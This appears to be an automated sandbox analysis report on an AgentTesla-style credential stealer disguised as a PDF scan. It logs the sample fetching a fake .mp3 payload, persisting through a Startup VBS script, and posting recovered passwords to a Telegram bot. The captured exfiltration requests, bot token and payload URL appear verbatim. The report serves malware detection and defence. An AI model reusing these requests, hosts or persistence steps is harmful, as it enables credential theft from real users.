Oct 15, 2024 21:32:11.635629892 CEST | 1.1.1.1 | 192.168.2.6 | 0x3270 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                                        • rubberpartsmanufacturers.com
                                                                        • api.telegram.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49711 | 103.191.208.122 | 443 | 6272 | C:\Users\user\Desktop\rScan_0984829339_PDF.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-15 19:32:03 UTC | 99 | OUT | GET /hunziq/Sgtuwurbrz.mp3 HTTP/1.1
  Host: rubberpartsmanufacturers.com
  Connection: Keep-Alive
2024-10-15 19:32:03 UTC | 235 | IN | HTTP/1.1 200 OK
  Date: Tue, 15 Oct 2024 19:32:03 GMT
  Server: Apache
  Upgrade: h2,h2c
  Connection: Upgrade, close
  Last-Modified: Tue, 15 Oct 2024 03:31:25 GMT
  Accept-Ranges: bytes
  Content-Length: 990216
  Content-Type: audio/mpeg


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        1 | 192.168.2.6 | 49739 | 149.154.167.220 | 443 | 1472 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-10-15 19:32:12 UTC | 260 | OUT | POST /bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendDocument HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=---------------------------8dced2e8905a837
                                                                        Host: api.telegram.org
                                                                        Content-Length: 924
                                                                        Expect: 100-continue
                                                                        Connection: Keep-Alive
                                                                        2024-10-15 19:32:12 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                                        2024-10-15 19:32:12 UTC | 924 | OUT | Data Ascii:

                                                                        -----------------------------8dced2e8905a837
                                                                        Content-Disposition: form-data; name="chat_id"

                                                                        1673719962
                                                                        -----------------------------8dced2e8905a837
                                                                        Content-Disposition: form-data; name="caption"

                                                                        New PW Recovered!

                                                                        Time: 10/15/2024 15:32:10
                                                                        User
                                                                        2024-10-15 19:32:13 UTC | 1038 | IN | HTTP/1.1 200 OK
                                                                        Server: nginx/1.18.0
                                                                        Date: Tue, 15 Oct 2024 19:32:13 GMT
                                                                        Content-Type: application/json
                                                                        Content-Length: 650
                                                                        Connection: close
                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                        Access-Control-Allow-Origin: *
                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                        {"ok":true,"result":{"message_id":891,"from":{"id":7162202130,"is_bot":true,"first_name":"xxxyyyzzznexy","username":"xxxyyyzzzz_bot"},"chat":{"id":1673719962,"first_name":"Good","last_name":"Fellas","type":"private"},"date":1729020733,"document":{"file_name":"user-114127 2024-10-15 15-32-10.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIDe2cOwz1-C-yNXsJmmO7Jijef9D3rAALtFQACfn15UMJON6ZUMqDfNgQ","file_unique_id":"AgAD7RUAAn59eVA","file_size":322},"caption":"New PW Recovered!\n\nTime: 10/15/2024 15:32:10\nUser Name: user/114127\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        2 | 192.168.2.6 | 49804 | 103.191.208.122 | 443 | 5588 | C:\Users\user\AppData\Roaming\Guid.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-10-15 19:32:26 UTC | 99 | OUT | GET /hunziq/Sgtuwurbrz.mp3 HTTP/1.1
                                                                        Host: rubberpartsmanufacturers.com
                                                                        Connection: Keep-Alive
                                                                        2024-10-15 19:32:26 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                        Date: Tue, 15 Oct 2024 19:32:26 GMT
                                                                        Server: Apache
                                                                        Upgrade: h2,h2c
                                                                        Connection: Upgrade, close
                                                                        Last-Modified: Tue, 15 Oct 2024 03:31:25 GMT
                                                                        Accept-Ranges: bytes
                                                                        Content-Length: 990216
                                                                        Content-Type: audio/mpeg


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        3 | 192.168.2.6 | 49831 | 149.154.167.220 | 443 | 6708 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-10-15 19:32:31 UTC | 260 | OUT | POST /bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendDocument HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=---------------------------8dced2e9445f11a
                                                                        Host: api.telegram.org
                                                                        Content-Length: 924
                                                                        Expect: 100-continue
                                                                        Connection: Keep-Alive
                                                                        2024-10-15 19:32:31 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                                        2024-10-15 19:32:31 UTC | 924 | OUT | Data Ascii:

                                                                        -----------------------------8dced2e9445f11a
                                                                        Content-Disposition: form-data; name="chat_id"

                                                                        1673719962
                                                                        -----------------------------8dced2e9445f11a
                                                                        Content-Disposition: form-data; name="caption"

                                                                        New PW Recovered!

                                                                        Time: 10/15/2024 15:32:29
                                                                        User
                                                                        2024-10-15 19:32:32 UTC | 1038 | IN | HTTP/1.1 200 OK
                                                                        Server: nginx/1.18.0
                                                                        Date: Tue, 15 Oct 2024 19:32:32 GMT
                                                                        Content-Type: application/json
                                                                        Content-Length: 650
                                                                        Connection: close
                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                        Access-Control-Allow-Origin: *
                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                        {"ok":true,"result":{"message_id":892,"from":{"id":7162202130,"is_bot":true,"first_name":"xxxyyyzzznexy","username":"xxxyyyzzzz_bot"},"chat":{"id":1673719962,"first_name":"Good","last_name":"Fellas","type":"private"},"date":1729020752,"document":{"file_name":"user-114127 2024-10-15 15-32-29.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIDfGcOw1Bay52ZEA2552tOHFfala8tAALuFQACfn15UFuEHTrNEKBkNgQ","file_unique_id":"AgAD7hUAAn59eVA","file_size":322},"caption":"New PW Recovered!\n\nTime: 10/15/2024 15:32:29\nUser Name: user/114127\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                                        Target ID:0
                                                                        Start time:15:31:59
                                                                        Start date:15/10/2024
                                                                        Path:C:\Users\user\Desktop\rScan_0984829339_PDF.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\rScan_0984829339_PDF.exe"
                                                                        Imagebase:0x940000
                                                                        File size:220'160 bytes
                                                                        MD5 hash:A89DCE2412407F0BD1F4B9E575545AEB
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2262633916.0000000002DA7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2280814775.0000000003E81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2280814775.0000000003E81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2280814775.0000000003E81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2262633916.0000000002F85000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2262633916.0000000002F85000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2262633916.0000000002F85000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2284941068.0000000006920000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2280814775.0000000003F54000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2280814775.0000000003F54000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2280814775.0000000003F54000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:2
                                                                        Start time:15:32:09
                                                                        Start date:15/10/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                        Imagebase:0xc40000
                                                                        File size:42'064 bytes
                                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2453773157.0000000002FDA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2453773157.0000000002FBE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2449463464.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2449463464.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.2449463464.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2453773157.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2453773157.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.2453773157.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        Target ID:4
                                                                        Start time:15:32:22
                                                                        Start date:15/10/2024
                                                                        Path:C:\Windows\System32\wscript.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Guid.vbs"
                                                                        Imagebase:0x7ff79b850000
                                                                        File size:170'496 bytes
                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:5
                                                                        Start time:15:32:23
                                                                        Start date:15/10/2024
                                                                        Path:C:\Users\user\AppData\Roaming\Guid.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\AppData\Roaming\Guid.exe"
                                                                        Imagebase:0xd00000
                                                                        File size:220'160 bytes
                                                                        MD5 hash:A89DCE2412407F0BD1F4B9E575545AEB
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2451764397.00000000033C2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2451764397.00000000033C2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.2451764397.00000000033C2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2482319443.00000000040A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2482319443.00000000040A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.2482319443.00000000040A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.2451764397.0000000003018000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Antivirus matches:
                                                                        • Detection: 100%, Joe Sandbox ML
                                                                        • Detection: 32%, ReversingLabs
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:6
                                                                        Start time:15:32:28
                                                                        Start date:15/10/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                        Imagebase:0x610000
                                                                        File size:42'064 bytes
                                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.3430262414.00000000028DB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.3430262414.00000000028BF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3430262414.0000000002871000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.3430262414.0000000002871000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.3430262414.0000000002871000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:moderate
                                                                        Has exited:false

                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a9843023a3e47c327f73d3894d7ca9971d59be77ed092e2a722f76f82d6baf4f
                                                                          • Instruction ID: 369b5683515858dba56a1956a33953fad8e33c543b37e81eca4b8cd13e8b7d0f
                                                                          • Opcode Fuzzy Hash: a9843023a3e47c327f73d3894d7ca9971d59be77ed092e2a722f76f82d6baf4f
                                                                          • Instruction Fuzzy Hash: 2C313370D002599FDB14DFAAC580ADEBFF5BF48340F248029E909AB250DB759945CBA0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bf29fcef06a603354021ae6f82cf949243a6ec598406267a51590a818d904a54
                                                                          • Instruction ID: ecef338bc267530cb88f1a56e44eb5fad26ef5e115e4e8392ec57b9d8a586fe1
                                                                          • Opcode Fuzzy Hash: bf29fcef06a603354021ae6f82cf949243a6ec598406267a51590a818d904a54
                                                                          • Instruction Fuzzy Hash: 4131BF35A00218DFCF15EFA9DA8059EBBF2BFC9360F54856AD845A7301DB30AD44CBA1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 40475d688a6ae61196f335eb9f3d2c8907d7c8ecf1181ef5b0044a9c0792c565
                                                                          • Instruction ID: f0cd6b33f3f9ac60822170fef4d6fbf3dddb15219b593b92602eb331da77eada
                                                                          • Opcode Fuzzy Hash: 40475d688a6ae61196f335eb9f3d2c8907d7c8ecf1181ef5b0044a9c0792c565
                                                                          • Instruction Fuzzy Hash: 5D216B34A01214DFDB14EFB9D898AADBBF2BF89714F204469E405EB3A0CB71AC41CB50
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a8652e42c18dcffa65358efb71a6936cdc0d52eb9886f61ae8f172dbe15a5fd5
                                                                          • Instruction ID: 8d8def7f5c95731f436b9d9011680fa72ce74b5c33a5daa7aa37fc4e29eb85be
                                                                          • Opcode Fuzzy Hash: a8652e42c18dcffa65358efb71a6936cdc0d52eb9886f61ae8f172dbe15a5fd5
                                                                          • Instruction Fuzzy Hash: 3C21C0313202008FD345EB3DD894A1A3BA5EF8AB04B15419AE005CB3B6DA24DC09CB50
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c83347ba2e6128bece54f361f7ac7911871e5668e3251bcc53b515b3a45fab89
                                                                          • Instruction ID: 239bea893576003f07d90ce43a56ec78eeac69222f30823e4b8267ad8ccbbed0
                                                                          • Opcode Fuzzy Hash: c83347ba2e6128bece54f361f7ac7911871e5668e3251bcc53b515b3a45fab89
                                                                          • Instruction Fuzzy Hash: A33127B4D01228DFDB44EFA8D0487AEBBF6FF49308FA090A9D509A3254D7384A84CB55
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d985b28024cb5abd46788a1f7c99fd4b1de836553435ac1c792568ea10435081
                                                                          • Instruction ID: 9cfbeb3146159ed6e05bf4a5d18d3a7cf2523affd74bf325f8751cf5c88092ad
                                                                          • Opcode Fuzzy Hash: d985b28024cb5abd46788a1f7c99fd4b1de836553435ac1c792568ea10435081
                                                                          • Instruction Fuzzy Hash: FB212274E00229CFDB04EFE9D8447EEBBF6FB89308F108129C515B7244DBB859408BA1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2261557118.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_125d000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7475a8c305d45de7be1802f6c06fd0941f3e6b213c3ace7e6a1d1b6f6b80afd3
                                                                          • Instruction ID: 446b9494ab438fb734f462e33b51975837234b4523ad2a239fe9a81a596274f0
                                                                          • Opcode Fuzzy Hash: 7475a8c305d45de7be1802f6c06fd0941f3e6b213c3ace7e6a1d1b6f6b80afd3
                                                                          • Instruction Fuzzy Hash: 272146B6124248DFDB55DF58D9C0B26BF65FB88324F24C56DEE090B242C376D40ACBA2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b9826ee4eeca80d0ac9b3161b31ea837e22fe92b02008933b4fc77dbb97f5856
                                                                          • Instruction ID: b3be3723e636251ae5ce376d4eb0387e41e64a31828c5b528b759b17c551a6c7
                                                                          • Opcode Fuzzy Hash: b9826ee4eeca80d0ac9b3161b31ea837e22fe92b02008933b4fc77dbb97f5856
                                                                          • Instruction Fuzzy Hash: 89215C30A012189FDB14EF79D498A9DBBF6BF88714F604469E405AB3A0CA719C45CB90
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2283005490.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2282883886.0000000005AB0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5ab0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1e1d5e5a26fe2aa21e4d44de1c366691ddce2c486f67077f34eadb9537cef64d
                                                                          • Instruction ID: c7d5dad9fef1eda98f2ebc02159e94048ad78ab71fe23f0601f9dc213353eb23
                                                                          • Opcode Fuzzy Hash: 1e1d5e5a26fe2aa21e4d44de1c366691ddce2c486f67077f34eadb9537cef64d
                                                                          • Instruction Fuzzy Hash: D6212878D04219CBDB08DFA9D8487BEBBB6FF89304F1090A9D505A3394DB746949CFA0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9c738ff3b24a9908a645ba5b5440c6bec2f62a522c25dc77d56bfe1381550ad0
                                                                          • Instruction ID: d628ca0b44833a58fcb678ea036e07029cc9aa344d5e752594ffaff3721f5904
                                                                          • Opcode Fuzzy Hash: 9c738ff3b24a9908a645ba5b5440c6bec2f62a522c25dc77d56bfe1381550ad0
                                                                          • Instruction Fuzzy Hash: 3E117C353102109FD348EB2ED888E1A7BEAFFC8A187508169F50ACB375DE70EC058B80
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 60b7f6a8738ed32dacea27b81a3d405c1a452cb8eeb687e09b3b7d2cea89caa5
                                                                          • Instruction ID: be81c2e2c253d2d93a49023eb66315d1a597892c38b17d0b16786df4313e0b4b
                                                                          • Opcode Fuzzy Hash: 60b7f6a8738ed32dacea27b81a3d405c1a452cb8eeb687e09b3b7d2cea89caa5
                                                                          • Instruction Fuzzy Hash: 5A112371E0422DCBDB04EFAAC4456EEBBFAFB88314F04903AD509B3210D7741A45CBA1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2261557118.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_125d000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b4b5c62d74ef7dbd0f0298782f6981a4020ab818640269a2a7c5de0ff3647828
                                                                          • Instruction ID: 827b131d5586f432d8f0956bcc72c3d9d1e7341d1c24a2d021ae90ef7cbc462b
                                                                          • Opcode Fuzzy Hash: b4b5c62d74ef7dbd0f0298782f6981a4020ab818640269a2a7c5de0ff3647828
                                                                          • Instruction Fuzzy Hash: FE11BE76504285CFDB12CF54DAC4B16BF72FB84314F24C6A9DD094B656C33AD41ACBA2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2285605041.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_72a0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1419a863c27973ba890f42cfb4bf4ca4424e9c1e6a28071cca1deef7e73ba9ab
                                                                          • Instruction ID: aa2a8b7e2e05a8ef7838386ddcd2f90bf56297e695d11c2d62341fe524ea2c49
                                                                          • Opcode Fuzzy Hash: 1419a863c27973ba890f42cfb4bf4ca4424e9c1e6a28071cca1deef7e73ba9ab
                                                                          • Instruction Fuzzy Hash: 7521D3B4A21228CFDB64DF58C888AD9BBF2FB48348F0041D5D91AA7354E7709E85CF50
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2285605041.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_72a0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 75d79a19a50967e8373af699d533f629d81dca7a7195bc6f5a836b07eae608bf
                                                                          • Instruction ID: 68858824f300b8ed4ce9d24b5bc148b79016d368cbb008aba79191df443243fe
                                                                          • Opcode Fuzzy Hash: 75d79a19a50967e8373af699d533f629d81dca7a7195bc6f5a836b07eae608bf
                                                                          • Instruction Fuzzy Hash: FB11B7B0E0021A9FDB48DFE9C9457BEBBF5FF88300F10856AD518A7355DA705A418B91
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 71dd2958554d70a2832e03df80bd60eaf9fc060e87d3440afb284dcdfa8adc30
                                                                          • Instruction ID: 3989870bb686b7367922fe56abc8d13dd24ba40a89c9b2733fa480bf14056dcc
                                                                          • Opcode Fuzzy Hash: 71dd2958554d70a2832e03df80bd60eaf9fc060e87d3440afb284dcdfa8adc30
                                                                          • Instruction Fuzzy Hash: BF01DF7282C2908FC702DB78E9A558D7FB1EB56208B2840DFD044DB162D17A9A08CB12
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
